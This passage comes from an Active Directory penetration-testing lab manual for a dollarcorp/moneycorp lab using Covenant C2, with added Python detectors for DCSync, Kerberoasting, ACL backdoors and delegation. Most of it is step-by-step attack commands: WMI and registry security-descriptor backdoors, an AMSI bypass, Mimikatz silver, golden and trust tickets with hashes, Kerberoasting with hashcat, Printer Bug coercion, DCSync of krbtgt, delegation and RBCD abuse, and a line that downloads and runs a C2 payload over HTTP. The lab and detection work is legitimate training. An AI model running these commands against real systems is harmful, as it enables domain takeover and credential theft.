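"""Detect DCSync-style replication access in Security-log events (constructed samples)."""
import re

# Control-access right GUIDs that directory replication uses (well-known AD schema values).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts that legitimately replicate. In production build this from the
# Domain Controllers OU plus approved sync accounts; these are the lab DC names (assumption).
APPROVED_REPLICATORS = {"DCORP-DC$", "MCORP-DC$"}

DOMAIN_DN = "DC=dollarcorp,DC=moneycorp,DC=local"
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")
REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

# Constructed sample events; keys follow the EventData names of 4662 and 5136.
SAMPLE_EVENTS = [
    {   # routine DC-to-DC replication: expected
        "EventID": 4662, "SubjectUserName": "DCORP-DC$", "ObjectName": DOMAIN_DN,
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
        "Properties": REPL_PROPS,
    },
    {   # the DACL rewrite that Add-DomainObjectAcl -Rights DCSync performs
        "EventID": 5136, "SubjectUserName": "Administrator", "ObjectDN": DOMAIN_DN,
        "ObjectClass": "domainDNS", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
    },
    {   # a user account exercising replication rights: DCSync
        "EventID": 4662, "SubjectUserName": "student2", "ObjectName": DOMAIN_DN,
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
        "Properties": REPL_PROPS,
    },
    {   # control access with an unrelated GUID: ignored
        "EventID": 4662, "SubjectUserName": "student2",
        "ObjectName": "CN=dcorp-mgmt,CN=Computers," + DOMAIN_DN,
        "ObjectType": "%{bf967a86-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x100",
        "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}",
    },
]


def replication_rights_used(event):
    """Names of the replication rights referenced in a 4662 Properties field."""
    guids = set(GUID_RE.findall(event.get("Properties", "").lower()))
    return sorted(REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS)


def is_dcsync_candidate(event):
    """4662 that exercises replication rights from an account outside the allow-list."""
    if event.get("EventID") != 4662 or not replication_rights_used(event):
        return False
    return event.get("SubjectUserName", "").upper() not in APPROVED_REPLICATORS


def is_domain_acl_change(event):
    """5136 that modified the security descriptor of the domain object itself."""
    return (event.get("EventID") == 5136
            and event.get("ObjectDN", "").lower() == DOMAIN_DN.lower()
            and event.get("AttributeLDAPDisplayName", "").lower() == "ntsecuritydescriptor")


def scan_events(events):
    """Return (kind, account, rights) tuples in log order."""
    findings = []
    for ev in events:
        if is_domain_acl_change(ev):
            findings.append(("domain-acl-change", ev["SubjectUserName"], []))
        elif is_dcsync_candidate(ev):
            findings.append(("dcsync", ev["SubjectUserName"], replication_rights_used(ev)))
    return findings


if __name__ == "__main__":
    for kind, account, rights in scan_events(SAMPLE_EVENTS):
        print(f"{kind}: {account} {' '.join(rights)}".rstrip())
```

The 5136 check only fires if object-level auditing (Directory Service Changes) is enabled on the domain object, and the 4662 check needs Directory Service Access auditing; without either, the DCSync itself is invisible in the Security log, which is why both are worth confirming before relying on this logic.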

Learning Objective 13
Task

• Modify security descriptors on dcorp-dc to get access using PowerShell remoting and
WMI without requiring administrator access.
• Retrieve machine account hash from dcorp-dc without using administrator access and
use that to execute a Silver Ticket attack to get code execution with WMI.
Solution
Task - Modify security descriptors on dcorp-dc to get access using PowerShell
remoting and WMI without requiring administrator access.
Once we have administrative privileges on a machine, we can modify the security descriptors of services so that they can be accessed without administrative privileges. The command below (to be run as Domain Administrator) modifies the host security descriptor for WMI on the DC to allow studentx access to WMI. To perform this task we first need to import the Set-RemoteWMI.ps1 PowerShell script. Follow the steps below and then execute the command.
Note: - Since PSRemoting is not stable in the lab, we will only look at the WMI option.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select PowerShellImport from the GruntTask.


4. Browse the Set-RemoteWMI.ps1 PowerShell script.
5. Click on Task button.

• Command

PowerShell Set-RemoteWMI -UserName student2 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose

Now, we can execute WMI queries on the DC as studentx. We will execute the command below from the Student VM. Before we execute the WMI command, let us purge all the tickets.

• Command

PowerShell gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Task - Retrieve machine account hash from dcorp-dc without using
administrator access and use that to execute a Silver Ticket attack to get code
execution with WMI.
To retrieve the machine account hash without DA, we first need to modify permissions on the DC. Domain Admin privileges are required to deploy the backdoor. We will use the Add-RemoteRegBackdoor.ps1 PowerShell script to grant the permissions.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select PowerShellImport from the GruntTask.


4. Browse the Add-RemoteRegBackdoor.ps1 PowerShell script.
5. Click on Task button.

• Command

PowerShell Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student2 -Verbose

Now, we can retrieve the hash as studentx. We will execute the command below from the Student VM. To extract the machine account hash, we will use the RemoteHashRetrieval.ps1 PowerShell script.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select PowerShellImport from the GruntTask.


4. Browse the RemoteHashRetrieval.ps1 PowerShell script.
5. Click on Task button.

• Command

PowerShell Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Note: - If you get the error shown in the screenshot below while executing the above command, use the following command instead.

• Command

ShellCmd PowerShell -c "IEX (Get-Content C:\AD\Tools\amsibypass.txt -Raw); . C:\AD\Tools\RACE.ps1; Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose"

We can use the machine account hash to create Silver Tickets. Create Silver Tickets for the HOST and RPCSS services using the machine account hash to execute WMI queries. We will use the Student VM grunt to create the Silver Tickets.
Before injecting the tickets, we will need to create a new token using MakeToken and then inject the tickets.
• Command

MakeToken Administrator dollarcorp.moneycorp.local dummypassword

Note: Import Invoke-Mimi.ps1 script if not imported.
• Command

PowerShell Invoke-Mimi -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1be12164a06b817e834eb437dc8f581c /user:Administrator /ptt"'

• Command

PowerShell Invoke-Mimi -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:1be12164a06b817e834eb437dc8f581c /user:Administrator /ptt"'

Now that we have tickets for the HOST and RPCSS services, we can execute commands on the dcorp-dc machine using WMI.
• Command

PowerShell gwmi -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Once we have gained access, we can execute RevertToSelf to restore our access as the student user.
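
Set-RemoteWMI and Add-RemoteRegBackdoor work by rewriting security descriptors, so the durable artifact they leave behind is an extra ACE. As an added example (not from the lab manual or the RACE scripts), the Python below parses the DACL of an SDDL string and lists the ACEs whose trustee is not one a stock root\cimv2 namespace contains; the same parser applies to registry-key SDDL read back with Get-Acl. The two SDDL strings are constructed samples (the default namespace descriptor, and the same descriptor with an ACE added for a domain user whose RID 9999 is made up), and the SDDL-to-WMI right names follow Microsoft's namespace security documentation.

```python
"""Audit an SDDL DACL (WMI namespace or registry key) for unexpected trustees."""
import re

# Two-letter SID aliases a default root\cimv2 DACL contains (SY added for registry keys).
EXPECTED_TRUSTEES = {"BA", "NS", "LS", "AU", "SY"}

# SDDL access-right codes as the WMI namespace security dialog names them.
WMI_RIGHTS = {
    "CC": "Enable Account", "DC": "Execute Methods", "LC": "Full Write",
    "SW": "Partial Write", "RP": "Provider Write", "WP": "Remote Enable",
    "RC": "Read Security", "WD": "Edit Security",
}

# Constructed samples: the stock root\cimv2 descriptor, and the same with an
# extra ACE for a domain user (the RID 9999 is made up for the example).
DEFAULT_CIMV2 = ("O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)"
                 "(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)")
MODIFIED_CIMV2 = DEFAULT_CIMV2 + \
    "(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-9999)"

DACL_RE = re.compile(r"D:([A-Z]*)((?:\([^)]*\))*)")  # D:<flags><aces>; stops before S:
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl):
    """Return the DACL's ACEs as dicts with type, flags, rights and trustee."""
    match = DACL_RE.search(sddl)
    if not match:
        return []
    aces = []
    for body in ACE_RE.findall(match.group(2)):
        fields = body.split(";")  # type;flags;rights;object_guid;inherit_guid;trustee
        if len(fields) < 6:
            continue  # malformed ACE: skip rather than guess
        aces.append({"type": fields[0], "flags": fields[1],
                     "rights": fields[2], "trustee": fields[5]})
    return aces


def split_rights(rights):
    """'CCDCRP' -> ['CC', 'DC', 'RP']; a hex mask is returned unchanged."""
    if rights.lower().startswith("0x"):
        return [rights]
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]


def wmi_rights(rights):
    """Human-readable WMI namespace rights for an SDDL rights string."""
    return [WMI_RIGHTS.get(code, code) for code in split_rights(rights)]


def unexpected_aces(sddl, expected=EXPECTED_TRUSTEES):
    """Allow-ACEs whose trustee is outside the expected set of principals."""
    return [ace for ace in parse_dacl(sddl)
            if ace["type"] == "A" and ace["trustee"] not in expected]


if __name__ == "__main__":
    for label, sddl in (("default", DEFAULT_CIMV2), ("modified", MODIFIED_CIMV2)):
        for ace in unexpected_aces(sddl):
            print(f"{label}: {ace['trustee']} -> {', '.join(wmi_rights(ace['rights']))}")
```

Remote Enable is the right that makes the namespace reachable from another host, so an ACE granting it to a non-administrative SID is the finding to act on; comparing against a baseline descriptor captured from a known-good DC avoids hard-coding the alias list.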

Learning Objective 14
Task

• Using the Kerberoast attack, crack password of a SQL server service account.
Solution
Task - Using the Kerberoast attack, crack password of a SQL server service
account.
We first need to find services running under user accounts, since services running under machine accounts have long, random passwords. We can use PowerView (Get-DomainUser -SPN) or the ActiveDirectory module to discover such services. We will use the Student VM for executing the PowerView commands. To import the PowerView script, please follow the steps provided in the section above.
• Command

PowerShell Get-DomainUser -SPN

Neat! svcadmin, which is a domain administrator, has an SPN set! Let us retrieve the hash for the svcadmin user using the Rubeus Built-in task.
• Command

Rubeus kerberoast /user:svcadmin /simple /rc4opsec

As we can see, we have got the hash for the svcadmin user. We will save the hash value in a file and then use Hashcat to crack the password. We will use 10k-worst-pass.txt as the password list; the path of the wordlist may differ.
• Command

hashcat -m 13100 svcadmin.txt Tools/kerberoast/10k-worst-pass.txt
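
Kerberoasting leaves a trace on the DC: every service-ticket request is a 4769 event carrying the requester, the service account name and the ticket encryption type. As an added example (not from the lab manual or Rubeus), the Python below applies two rules to constructed 4769 samples: RC4 (0x17) service tickets for user accounts, which is what a default Kerberoast requests, and one requester collecting tickets for many user-account SPNs, which still fires when opsec-style requests use AES. The sample events, the sqlsvc account name and the threshold of three are assumptions.

```python
"""Spot Kerberoasting patterns in Security event 4769 data (constructed samples)."""
from collections import defaultdict

RC4_HMAC = "0x17"    # TicketEncryptionType for RC4-HMAC; AES types are 0x11 / 0x12
BULK_THRESHOLD = 3   # distinct user-account services per requester (assumed tuning value)

# Constructed 4769 events; keys follow the EventData field names.
_REQ = "student2@DOLLARCORP.MONEYCORP.LOCAL"
SAMPLE_4769 = [
    {"EventID": 4769, "TargetUserName": _REQ, "ServiceName": "DCORP-MSSQL$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.16.100.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": _REQ, "ServiceName": "svcadmin",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.16.100.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": _REQ, "ServiceName": "sqlsvc",   # made-up account
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.16.100.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": _REQ, "ServiceName": "websvc",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.16.100.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": _REQ, "ServiceName": "krbtgt",   # TGT renewal
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.16.100.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "appadmin@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "svcadmin", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:172.16.100.61", "Status": "0x0"},  # one AES request: benign
]


def requester(event):
    """Account that asked for the ticket, without the realm suffix."""
    return event["TargetUserName"].split("@")[0].lower()


def is_user_account_service(service_name):
    """Tickets for user accounts (not machine$ and not krbtgt) are the crackable ones."""
    name = service_name.split("@")[0]
    return not name.endswith("$") and name.lower() != "krbtgt"


def successful_tgs(events):
    return [e for e in events if e.get("EventID") == 4769 and e.get("Status") == "0x0"]


def rc4_roasts(events):
    """(requester, service) pairs where an RC4 ticket was issued for a user-account SPN."""
    return sorted({(requester(e), e["ServiceName"]) for e in successful_tgs(events)
                   if e.get("TicketEncryptionType") == RC4_HMAC
                   and is_user_account_service(e["ServiceName"])})


def bulk_requesters(events, threshold=BULK_THRESHOLD):
    """Requesters that collected tickets for at least `threshold` user-account SPNs."""
    per_user = defaultdict(set)
    for e in successful_tgs(events):
        if is_user_account_service(e["ServiceName"]):
            per_user[requester(e)].add(e["ServiceName"])
    return {user: sorted(svcs) for user, svcs in per_user.items() if len(svcs) >= threshold}


if __name__ == "__main__":
    print("RC4 service tickets for user accounts:", rc4_roasts(SAMPLE_4769))
    print("Bulk requesters:", bulk_requesters(SAMPLE_4769))
```

In a real pipeline the bulk rule is evaluated per time window and the RC4 rule is tuned against accounts that genuinely lack AES keys; the underlying mitigation is the same either way, long random passwords (or gMSA) for every account that carries an SPN.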

Learning Objective 15
Task

• Find a server in the dcorp domain where Unconstrained Delegation is enabled.
• Compromise the server and escalate to Domain Admin privileges.
• Escalate to Enterprise Admins privileges by abusing the Printer Bug.
Solution
Task - Find a server in the dcorp domain where Unconstrained Delegation is
enabled.
We first need to find a server that has unconstrained delegation enabled. We will use PowerView for enumeration.
• Command

PowerShell Get-DomainComputer -Unconstrained | select -ExpandProperty name

Task - Compromise the server and escalate to Domain Admin privileges.
Since the prerequisite for elevation using unconstrained delegation is having admin access to the machine, we need to compromise a user who has local admin access on dcorp-appsrv. Recall that we extracted the secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let us check if any of them has local admin privileges on dcorp-appsrv. First, we will try with appadmin and the Built-in Mimikatz task to perform the OverPass-The-Hash attack.

Download the StudentVMGrunt.exe file on the Student VM and save it to disk. In our case the file is already on disk, so we will use it. If the file is not present, we can use the command below to download it.
Note: - We can also use the Upload option to upload our Grunt file to the machine.
• Command

PowerShell iwr -UseBasicParsing http://172.16.100.61/StudentVMGrunt.exe -OutFile C:\Users\Public\Downloads\StudentVMGrunt.exe

Below are the steps to perform Over-Pass-The-Hash attack using Mimikatz and execute the
Grunt with appadmin privilege. We need to perform these steps using elevated privileges.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" in the Command field.
5. Click on the Task button.

The new Grunt is connected back to our Covenant C2 with appadmin user token.

We need to add a note to the new Grunt so that we can identify that it holds the token of the appadmin user.

Steps

1. Click on the Grunt name in the Grunts page

2. Enter "appadmin user privilege" in the Note field.

3. Click on Edit button

Now, let us use Find-PSRemotingLocalAdminAccess.ps1 to check if appadmin has local administrator privileges on any other machine in the domain where a domain admin session is available. We will need to import the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script using the PowerShellImport built-in task in Covenant. But before that we need to run the AMSI bypass using the built-in command BypassAmsi.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select PowerShellImport from the GruntTask.


4. Browse the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script.
5. Click on Task button.

• Command

PowerShell Find-PSRemotingLocalAdminAccess

Let us gain access to the dcorp-appsrv server using PSRemoting.

• Command

PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr 'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local

Now, let us abuse the Printer Bug by leveraging Rubeus and MS-RPRN or PetitPotam to force authentication from the dcorp-dc$ account. First, we will start the Rubeus listener on the dcorp-appsrv machine. But before that we need to run the AMSI bypass using the built-in command BypassAmsi.
• Command

Rubeus monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

Now, from the Student VM grunt, we will force authentication from dcorp-dc$ using the MS-RPRN.exe file.

• Command

ShellCmd C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

On the Rubeus listener, we can see the TGT of dcorp-dc$.

Once we get our ticket, we need to kill the Rubeus task. First, we need to list all the running tasks and then use the Task id to kill the task, as shown in the screenshot below.

So now let us inject the ticket in the StudentVM grunt. Before injecting the ticket, we will
need to create a new token using MakeToken and then inject the ticket.
• Command

MakeToken DCORP-DC$ dollarcorp.moneycorp.local dummypassword

• Command

Rubeus ptt /ticket:doIGRTCCBkGgAwIBBaEDAgEWooIFGjCCBRZhggUSMIIFDqADAgEFoRwbG...

Now, we can perform the DCSync attack using the Built-in Mimikatz task. Enter
"lsadump::dcsync /user:dcorp\krbtgt" in the command field.

Task - Escalate to Enterprise Admins privileges by abusing the Printer Bug.
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the
below command to listen for mcorp-dc$ tickets on dcorp-appsrv.
• Command

Rubeus monitor /targetuser:MCORP-DC$ /interval:5 /nowrap

Now, from the Student VM, we will force authentication from mcorp-dc$ using the MS-RPRN.exe file.
• Command

ShellCmd C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

On the Rubeus listener, we can see the TGT of mcorp-dc$.

Once we get our ticket, we need to kill the Rubeus task. First, we need to list all the running tasks and then use the Task id to kill the task, as shown in the screenshot below.

So now let us inject the ticket in the StudentVM grunt. Before injecting the ticket, we will need
to create a new token using MakeToken and then inject the ticket. We need to first execute
RevertToSelf command.

• Command

RevertToSelf

MakeToken MCORP-DC$ moneycorp.local dummypassword

• Command

Rubeus ptt /ticket:doIF1jCCBdKgAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoREbD...

Now, we can perform the DCSync attack using the Built-in Mimikatz task. Enter
"lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" in the command field.

Awesome! We escalated to Enterprise Admins too!

Learning Objective 16
Task

• Enumerate users in the domain for whom Constrained Delegation is enabled.
o For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
o Pass the ticket and access the service.
• Enumerate computer accounts in the domain for which Constrained Delegation is enabled.
o For such a user, request a TGT from the DC.
o Obtain an alternate TGS for LDAP service on the target machine.
o Use the TGS for executing DCSync attack.
Solution
Task - Enumerate users in the domain for whom Constrained Delegation is
enabled.
We first need to find users for whom constrained delegation is enabled. We will use the Student VM and the PowerView.ps1 PowerShell script for enumeration. Steps to import the PowerView script can be found in the earlier section.

• Command

PowerShell Get-DomainUser -TrustedToAuth

We already have the hash of websvc that we extracted from the dcorp-adminsrv machine. We can use either Kekeo or Rubeus to abuse constrained delegation using the AES key of the websvc user; we will use Rubeus, from the Student VM.
Before injecting the ticket, we will need to create a new token using MakeToken and then inject the ticket. We need to first execute the RevertToSelf command.

• Command

RevertToSelf

MakeToken administrator dollarcorp.moneycorp.local dummypassword

• Command

Rubeus s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.local /ptt

Try accessing the filesystem on dcorp-mssql.

• Command

ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Task - Enumerate computer accounts in the domain for which Constrained
Delegation is enabled.
For the next task, enumerate the computer accounts with constrained delegation enabled using PowerView. We need to execute the RevertToSelf command before enumerating.
• Command

RevertToSelf

PowerShell Get-DomainComputer -TrustedToAuth

Next, let us abuse the constrained delegation of dcorp-adminsrv$ using Rubeus. Note that in the /altservice parameter we specify ldap so that we can perform the DCSync attack. Please note that the hash of dcorp-adminsrv$ may be different for you in the lab. We will use the Student VM for performing the activity.
Before injecting the ticket, we will need to create a new token using MakeToken and then inject the ticket.

• Command

MakeToken administrator dollarcorp.moneycorp.local dummypassword

• Command

Rubeus s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt

Now, let us perform the DCSync attack. We will use the Built-in Mimikatz task.
Enter "lsadump::dcsync /user:dcorp\krbtgt" value in the Command field.

Learning Objective 17
Task

• Find a computer object in dcorp domain where we have Write permissions.
• Abuse the Write permissions to access that computer as Domain Admin.
Solution
Task - Find a computer object in dcorp domain where we have Write
permissions.
After trying from multiple users, or by using BloodHound, we find that the user ciadmin has write privileges on the computer object of dcorp-mgmt. We need to execute the RevertToSelf command before enumerating.
• Command

RevertToSelf
PowerShell Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'ciadmin'}

Task - Abuse the Write permissions to access that computer as Domain
Admin.
Recall that we compromised ciadmin from dcorp-ci. We will use the grunt that we have on dcorp-ci as ciadmin, and PowerView, to configure RBCD on dcorp-mgmt. To import PowerView we can follow the steps mentioned earlier. But before that we need to run the AMSI bypass using the built-in command BypassAmsi.
• Command

PowerShell Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-student2$' -Verbose

Now, let us check if RBCD is set correctly.
• Command

PowerShell Get-DomainRBCD

Let us extract the AES keys from the student VM using the Built-in Mimikatz task. Enter "sekurlsa::ekeys" in the Command field. We will need to use the elevated grunt of our student VM.

Now let us use Rubeus to abuse RBCD to gain access to dcorp-mgmt as the Domain Administrator – Administrator. We will use our student VM grunt to abuse RBCD. Before injecting the ticket, we will need to create a new token using MakeToken and then inject the ticket.

• Command

MakeToken administrator dollarcorp.moneycorp.local dummypassword

• Command

Rubeus s4u /user:dcorp-student2$ /aes256:79b8e7b089ec5fb15ef481783d9b335223d2786923c1d8e6f6032d9527ae99f8 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

Now, let us check if we can access dcorp-mgmt.

• Command

PowerShell Invoke-Command -ComputerName dcorp-mgmt -ScriptBlock{whoami}
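
The enumeration in Learning Objectives 15, 16 and 17 (unconstrained delegation, constrained delegation with /altservice, and RBCD) can be turned into a single audit. As an added example (not from the lab manual or PowerView), the Python below walks a constructed LDAP-style export and reports non-DC computers with TRUSTED_FOR_DELEGATION, accounts with msDS-AllowedToDelegateTo (reporting the target host rather than the SPN, since the service class in the ticket is not enforced), computers with an RBCD entry, and privileged accounts that are not marked "sensitive and cannot be delegated". The objects, their userAccountControl values and the simplification of msDS-AllowedToActOnBehalfOfOtherIdentity to a list of principal names are assumptions made for the sample.

```python
"""Audit Kerberos delegation settings over an LDAP-style export (constructed sample data)."""
# userAccountControl bits (well-known values)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

DOMAIN_DN = "DC=dollarcorp,DC=moneycorp,DC=local"

# Constructed objects. "rbcd" stands in for msDS-AllowedToActOnBehalfOfOtherIdentity,
# reduced from its binary security descriptor to the principals it names (assumption).
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DCORP-DC$", "distinguishedName": "CN=DCORP-DC,OU=Domain Controllers," + DOMAIN_DN,
     "userAccountControl": 0x82000, "msDS-AllowedToDelegateTo": [], "rbcd": [], "adminCount": 0},
    {"sAMAccountName": "DCORP-APPSRV$", "distinguishedName": "CN=DCORP-APPSRV,CN=Computers," + DOMAIN_DN,
     "userAccountControl": 0x81000, "msDS-AllowedToDelegateTo": [], "rbcd": [], "adminCount": 0},
    {"sAMAccountName": "websvc", "distinguishedName": "CN=web svc,CN=Users," + DOMAIN_DN,
     "userAccountControl": 0x1010200, "rbcd": [], "adminCount": 0,
     "msDS-AllowedToDelegateTo": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.local"]},
    {"sAMAccountName": "DCORP-ADMINSRV$", "distinguishedName": "CN=DCORP-ADMINSRV,CN=Computers," + DOMAIN_DN,
     "userAccountControl": 0x1001000, "rbcd": [], "adminCount": 0,
     "msDS-AllowedToDelegateTo": ["time/dcorp-dc.dollarcorp.moneycorp.LOCAL"]},
    {"sAMAccountName": "DCORP-MGMT$", "distinguishedName": "CN=DCORP-MGMT,CN=Computers," + DOMAIN_DN,
     "userAccountControl": 0x1000, "msDS-AllowedToDelegateTo": [], "rbcd": ["DCORP-STUDENT2$"], "adminCount": 0},
    {"sAMAccountName": "Administrator", "distinguishedName": "CN=Administrator,CN=Users," + DOMAIN_DN,
     "userAccountControl": 0x200, "msDS-AllowedToDelegateTo": [], "rbcd": [], "adminCount": 1},
]


def is_domain_controller(obj):
    """DCs are expected to be trusted for delegation; anything else is not."""
    return "ou=domain controllers," in obj["distinguishedName"].lower()


def target_hosts(spns):
    """Hosts behind a list of SPNs. The service class is dropped on purpose: a
    ticket for one service on a host can be re-targeted to another (/altservice)."""
    return sorted({spn.split("/", 1)[1].split(":")[0].lower() for spn in spns if "/" in spn})


def audit_delegation(objects):
    """Return (kind, account, detail) findings for the delegation settings."""
    findings = []
    for obj in objects:
        name, uac = obj["sAMAccountName"], obj["userAccountControl"]
        if (uac & TRUSTED_FOR_DELEGATION) and not is_domain_controller(obj):
            findings.append(("unconstrained", name, ""))
        if obj["msDS-AllowedToDelegateTo"]:
            kind = ("constrained+protocol-transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION
                    else "constrained")
            findings.append((kind, name, ",".join(target_hosts(obj["msDS-AllowedToDelegateTo"]))))
        if obj["rbcd"]:
            findings.append(("rbcd", name, ",".join(sorted(obj["rbcd"]))))
        if obj["adminCount"] == 1 and not (uac & NOT_DELEGATED):
            findings.append(("privileged-delegatable", name, ""))
    return findings


if __name__ == "__main__":
    for kind, name, detail in audit_delegation(SAMPLE_OBJECTS):
        print(f"{kind:32} {name:18} {detail}")
```

The last finding is the mitigation side of all three objectives: a privileged account that is in Protected Users or carries NOT_DELEGATED cannot be impersonated through any of the delegation paths above, so it is the cheapest fix to apply while the delegation configuration itself is being reviewed.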

Learning Objective 18
Task

• Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key.
Solution
Task - Using DA access to dollarcorp.moneycorp.local, escalate privileges to
Enterprise Admin or DA to the parent domain, moneycorp.local using the
domain trust key.
We need the trust key for abusing the trust between dollarcorp and moneycorp, which can be retrieved using Mimikatz. We can run the command below to extract the trust key from the dcorp-dc grunt. We will use the Built-in Mimikatz task to extract the trust key. Enter "lsadump::trust /patch" in the Command field.
Note: If we have lost the grunt, we can follow the steps mentioned in the earlier section to get a new grunt on the dcorp-dc machine.

Forge a ticket with the SID History of Enterprise Admins by running the command below on the Student VM. We will use the Mimikatz PowerShell script to create the TGT. The steps to import the Mimikatz PowerShell script are covered in the earlier section.
• Command

PowerShell Invoke-Mimi -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:132f54e05f7c3db02e97c00ff3879067 /service:krbtgt /target:moneycorp.local /ticket:C:\Users\Public\trust_tkt.kirbi"'

Now, let us check whether the file was saved to disk.
• Command

ls C:\Users\Public\

We request and inject a TGS using Rubeus that leverages the TGT created by Mimikatz, as in the command below. We will need to use the new version of Rubeus to inject the ticket, using the Assembly task. Before injecting the ticket, we will need to create a new token using MakeToken and then inject the ticket.

• Command

RevertToSelf

MakeToken administrator moneycorp.local dummypassword

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select Assembly from the GruntTask.
4. Browse the Rubeus.exe file.
5. Enter Rubeus.exe value in AssemblyName field.
6. Enter asktgs /ticket:C:\Users\Public\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /domain:moneycorp.local /ptt value in Parameters field.
7. Click on Task button.

Now, try to access the target service – a success means escalation to the parent DA:
• Command

ls \\mcorp-dc.moneycorp.local\c$

Learning Objective 19
Task

